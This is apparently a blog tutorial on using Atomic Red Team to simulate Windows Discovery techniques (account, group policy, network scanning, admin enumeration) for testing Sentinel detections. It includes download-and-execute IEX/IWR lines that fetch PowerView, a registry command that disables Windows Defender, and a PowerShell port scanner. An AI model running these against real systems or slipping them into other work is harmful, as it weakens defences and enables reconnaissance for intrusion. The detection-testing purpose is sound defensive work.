Simulate Discovery Techniques on Windows via Atomic Red

M'hirsi Hamza
5 min read · Sep 29, 2023


Hi Medium! Here we are again with a new article related to Sentinel. We will simulate different attacks, and in the articles that follow we will show how to detect them.

Src: https://github.com/redcanaryco/atomic-red-team

This article

We will show how to test our SOC and its ability to detect different attacks, and also how to build robust rules. We can now import thousands of detection rules, but there is no promise that all of them work in our environment: each one has to be exercised and validated against our network to find out which rules fire and which do not.

Atomic Red Team is one of the best tools for running those tests. We will go through everything needed to simulate different techniques listed in MITRE ATT&CK and then try to detect them in Sentinel one by one.

This article will cover the following:

Install Atomic Red
- Import-Module
- Show test available for a given technique
- Check if prerequisites are available
- Completely disable Windows Defender
Execute Discovery techniques
- Account Discovery
- Application Window Discovery
- Browser Bookmark Discovery
- Domain Trust Discovery
- File and Directory Discovery
- Group Policy Discovery
- Network Service Scanning
- Network Share Discovery
- Network Sniffing
- Password Policy Discovery
- Peripheral Device Discovery
- Permission Groups Discovery
- Process Discovery
Conclusion

Install Atomic red

The installation is not that hard: you need PowerShell and a keyboard. To keep things simple, run it on Windows. We will go through the installation together, no worries 😊

Follow the linked installation guide step by step and you will have the tool installed within a few minutes. One thing to decide first is where the tool will run relative to the victim machine; you basically have two options:

  • Install it and use it on the victim's machine
  • Install it on your own machine and execute the tests on another machine through a PowerShell remoting session to the host you want to test.

To Start

The atomics folder contains the test definitions and the commands that the execution framework runs. To install the atomics folder at the same time as the execution framework, add the -getAtomics switch when installing the framework:

IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics

BooM, we are done. Let's apply a few changes to make the tool smoother to use.

Import-Module

We don't want to import the module every time we open PowerShell, so we create a profile:

PS> notepad $profile

And we add those lines into the file:

Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
$PSDefaultParameterValues = @{"Invoke-AtomicTest:PathToAtomicsFolder"="C:\AtomicRedTeam\atomics"}

Then we can load the profile by hand if needed; usually it is loaded automatically when PowerShell starts:

PS> . $profile

Show test available for a given technique

Let's run a few commands to make sure we are on the right track and not missing anything. These commands also help you understand what you are about to run. If you run into issues, check the tool's GitHub page for further debugging.

Show brief details about a technique:

PS> Invoke-AtomicTest T1003 -ShowDetailsBrief

Show brief details about all techniques:

PS> Invoke-AtomicTest All -ShowDetailsBrief

Show details about a technique:

PS> Invoke-AtomicTest T1003 -ShowDetails

Check if prerequisites are available

Each technique you execute corresponds to a folder in the atomics tree that holds one or more tests, each running several commands. Some of those commands need prerequisites (a binary, a script, a sample file) that you have to install first. I advise you to look at that folder and at the MITRE ATT&CK page of the technique so you understand what you are running.

Check if we can run the technique on the machine:

PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -CheckPrereqs
PS> Invoke-AtomicTest T1003 -CheckPrereqs

Satisfy the prerequisites:

PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -GetPrereqs
PS> Invoke-AtomicTest T1003 -GetPrereqs

Execute all tests for a given technique. You can run them one by one or all at once, depending on your needs:

PS> Invoke-AtomicTest T1218
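The steps above (list, check prerequisites, fetch them, run, clean up) as one script, as an added example that is not part of the original article or the Atomic Red Team docs. The hostname VICTIM01, the test numbers and the log path are assumptions; pick test numbers from the -ShowDetailsBrief listing for your copy of the atomics.

```powershell
# Added example: one technique end to end, locally and then over PowerShell remoting.
# Assumptions: atomics installed under C:\AtomicRedTeam, log path and hostname below.
$technique = 'T1087.001'                        # Account Discovery: Local Account
$tests     = 8, 9                               # assumption: the Windows tests listed by -ShowDetailsBrief
$logPath   = 'C:\AtomicRedTeam\logs\exec.csv'   # assumed log location

Invoke-AtomicTest $technique -ShowDetailsBrief

# Prerequisite check for the chosen tests, then fetch whatever is missing
Invoke-AtomicTest $technique -TestNumbers $tests -CheckPrereqs
Invoke-AtomicTest $technique -TestNumbers $tests -GetPrereqs

# Run with an execution log: the start/stop timestamps in the CSV are what you
# later line up against the events your SIEM ingested
Invoke-AtomicTest $technique -TestNumbers $tests -ExecutionLogPath $logPath

# Undo whatever the tests left behind (files, users, registry keys)
Invoke-AtomicTest $technique -TestNumbers $tests -Cleanup

# The same run against a remote victim (option 2 from the install section).
# The commands execute inside the remote session, so any file a test expects
# under PathToAtomicsFolder must exist on that host as well.
$cred = Get-Credential
$sess = New-PSSession -ComputerName 'VICTIM01' -Credential $cred   # assumed host
Invoke-AtomicTest $technique -TestNumbers $tests -Session $sess -ExecutionLogPath $logPath
Invoke-AtomicTest $technique -TestNumbers $tests -Session $sess -Cleanup
Remove-PSSession $sess
```

Keep the execution log: when an alert does not fire, the first question is whether the test actually ran at that time on that host, and the CSV answers it.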

Completely disable Windows Defender

Emmmm hahaha 😆, I don't know what to say, but disabling this dude is sometimes needed, so please use this carefully 😅. Two caveats: Microsoft stopped honouring the DisableAntiSpyware value on Windows 10 client editions with the August 2020 Defender update, and when Tamper Protection is on, registry and PowerShell changes to Defender settings are ignored anyway. On a current lab box, adding an exclusion for the atomics folder is usually enough and far less noisy than switching the engine off.

PS> New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
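A narrower alternative, as an added example that is not from the original article: check the current Defender state, exclude only the atomics folder, and restore the previous preferences when the test run is finished. The folder path is the install default used earlier in this article.

```powershell
# Added example: scope the Defender change to the atomics folder and revert it.
# Assumption: Atomic Red Team was installed to C:\AtomicRedTeam as shown above.
$atomicsRoot = 'C:\AtomicRedTeam'

# Where are we starting from? If IsTamperProtected is True, the registry trick
# and Set-MpPreference changes are silently ignored.
Get-MpComputerStatus |
    Select-Object AMRunningMode, RealTimeProtectionEnabled, IsTamperProtected

$before = Get-MpPreference            # snapshot so we can put things back

Add-MpPreference -ExclusionPath $atomicsRoot

# Optional: stop real-time scanning for the session. Needs local admin and
# Tamper Protection off, and it is exactly the kind of change SOC rules alert on.
# Set-MpPreference -DisableRealtimeMonitoring $true

# ... run the atomics here ...

# Put it back
Remove-MpPreference -ExclusionPath $atomicsRoot
Set-MpPreference -DisableRealtimeMonitoring $before.DisableRealtimeMonitoring

# Confirm the exclusion is gone
(Get-MpPreference).ExclusionPath
```

If you do disable real-time monitoring, note the time: Defender writes its own events for that change, and a detection for "Defender real-time protection disabled" is one you want to confirm fires anyway.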

Execute Discovery techniques

I used this link to check the available techniques; have a look, I promise it's needed.

Some techniques are not represented in Atomic Red Team, so you need to check the technique on MITRE ATT&CK and simulate it manually.

In the list below I go through all the commands and techniques I needed to run Discovery on my machine. For each technique I reviewed it in MITRE ATT&CK, and I attach the links for the first techniques.

Account Discovery

PS> Invoke-AtomicTest T1087.001
PS> Invoke-AtomicTest T1087.002

https://attack.mitre.org/techniques/T1087/

Application Window Discovery

PS> Invoke-AtomicTest T1010

https://attack.mitre.org/techniques/T1010/

Browser Bookmark Discovery

PS> Invoke-AtomicTest T1217

Domain Trust Discovery

PS> Invoke-AtomicTest T1482

File and Directory Discovery

PS> Invoke-AtomicTest T1083

Group Policy Discovery

If your copy of the atomics folder has no test for T1615 (check with Invoke-AtomicTest T1615 -ShowDetailsBrief), simulate it manually with commands such as gpresult, or PowerView's Get-DomainGPO and Get-DomainGPOLocalGroup.

Resources: https://attack.mitre.org/techniques/T1615/
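A manual T1615 simulation on a domain-joined host, as an added example that is neither an atomic test nor code from the original article. It uses only built-ins: gpresult for the policy applied to this machine, an ADSI LDAP query for every GPO in the domain (what Get-DomainGPO does), and a read of GptTmpl.inf from SYSVOL (what Get-DomainGPOLocalGroup parses for Restricted Groups). The output directory is an assumption.

```powershell
# Added example: Group Policy discovery without PowerView or RSAT.
# Assumptions: domain-joined host, domain user, $outDir below.
$outDir = "$env:TEMP\gpo-discovery"
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# 1. Resultant policy for this computer and the current user (built-in tool)
gpresult /r /scope:computer
gpresult /r /scope:user
gpresult /h "$outDir\gpresult.html" /f          # full HTML report

# 2. Enumerate every GPO in the domain via LDAP (equivalent of Get-DomainGPO)
$rootDse  = [ADSI]'LDAP://RootDSE'
$searcher = [ADSISearcher]'(objectClass=groupPolicyContainer)'
$searcher.SearchRoot = [ADSI]"LDAP://CN=Policies,CN=System,$($rootDse.defaultNamingContext)"
$searcher.PropertiesToLoad.AddRange([string[]]@('displayName', 'gPCFileSysPath', 'whenChanged'))
$gpos = $searcher.FindAll()

$gpos | ForEach-Object {
    [pscustomobject]@{
        Name    = $_.Properties['displayname'][0]
        SysVol  = $_.Properties['gpcfilesyspath'][0]
        Changed = $_.Properties['whenchanged'][0]
    }
} | Format-Table -AutoSize

# 3. Look inside each GPO's security template on SYSVOL: the [Group Membership]
#    section is where Restricted Groups pushes local admin membership
#    (what Get-DomainGPOLocalGroup extracts)
foreach ($gpo in $gpos) {
    $sysvolPath = $gpo.Properties['gpcfilesyspath'][0]
    $inf = Join-Path $sysvolPath 'MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
    if (Test-Path $inf) {
        "== $inf"
        Select-String -Path $inf -Pattern 'Group Membership', '__Members' -SimpleMatch
    }
}
```

Each step leaves a different trace: gpresult is a process creation event, the LDAP query shows up as a directory service request from a workstation, and reading GptTmpl.inf is SMB file access to SYSVOL. Checking which of the three your pipeline actually sees is the point of running them separately.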

Network Service Scanning

Install Nmap and Python and run the scanners manually with different parameters to see how the results differ, then try to catch those scans in your network logs. You can also use the command below, but some of its tests have Nmap or Python as prerequisites, so you still need them installed:

PS> Invoke-AtomicTest T1046
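For the manual variant, here is a plain TCP connect scan in PowerShell with a per-port timeout, added as an example that is not from the article or from the T1046 atomics. It gives you a second scanner with a very different network footprint from Nmap to compare in your logs. The target address and port list are assumptions; point it only at hosts you own.

```powershell
# Added example: TCP connect scan with a timeout per port, returning objects you
# can export and line up against firewall or Sysmon network events.
# Assumptions: target IP and default port list below.
function Invoke-TcpConnectScan {
    param(
        [Parameter(Mandatory)][string]$Target,
        [int[]]$Ports = @(21, 22, 23, 25, 53, 80, 88, 135, 139, 389, 443, 445, 3389, 5985),
        [int]$TimeoutMs = 300
    )
    foreach ($port in $Ports) {
        $client = New-Object System.Net.Sockets.TcpClient
        $async  = $client.BeginConnect($Target, $port, $null, $null)
        $open   = $false
        # Wait at most $TimeoutMs; a filtered port never answers, so do not block on it
        if ($async.AsyncWaitHandle.WaitOne($TimeoutMs)) {
            try { $client.EndConnect($async); $open = $true } catch { $open = $false }
        }
        $client.Close()
        [pscustomobject]@{
            Time   = Get-Date -Format o
            Target = $Target
            Port   = $port
            Open   = $open
        }
    }
}

# Scan an assumed lab host and keep the timestamps for correlation with your logs
$results = Invoke-TcpConnectScan -Target '192.168.56.10'
$results | Where-Object Open | Format-Table -AutoSize
$results | Export-Csv "$env:TEMP\tcp-scan.csv" -NoTypeInformation
```

Run it once with the default timeout and once with a much larger one: the slow run is the one most signature-style "N connections in M seconds" rules miss.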

Network Share Discovery

PS> Invoke-AtomicTest T1135

Network Sniffing

PS> Invoke-AtomicTest T1040

Password Policy Discovery

PS> Invoke-AtomicTest T1201

Peripheral Device Discovery

PS> Invoke-AtomicTest T1120

Permission Groups Discovery

PS> Invoke-AtomicTest T1069.001
PS> Invoke-AtomicTest T1069.002

Tests 4 to 6 of T1069.002 pull PowerView from a pinned PowerSploit commit and call it directly. If you prefer to run them by hand, these are the commands:

T1069.002 test 4

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose

T1069.002 test 5

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose

T1069.002 test 6

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose

#{computer_name} is the test's input argument placeholder: replace it with the hostname you want to check, or let Invoke-AtomicTest fill it in (it prompts for, or takes via -InputArgs, any argument the test defines).

Process Discovery

T1424 is the Mobile-matrix ID for Process Discovery, which is why Atomic Red Team has nothing under it. The Enterprise technique is T1057, which does have atomic tests, so run T1057 with Invoke-AtomicTest like the techniques above, or simply use ps (Get-Process), tasklist, or whatever else you prefer.

Resources: https://attack.mitre.org/techniques/T1057/

Conclusion

All these commands will help you run different Discovery techniques and try to catch them in your logs and alerts, but you need to take into consideration that attackers always try to


M'hirsi Hamza

Cyber Security Architect at Rakuten Symphony Deutschland, talks about #innovation, #technology, #cyberattack, #cyberdefense, and #cybersecurity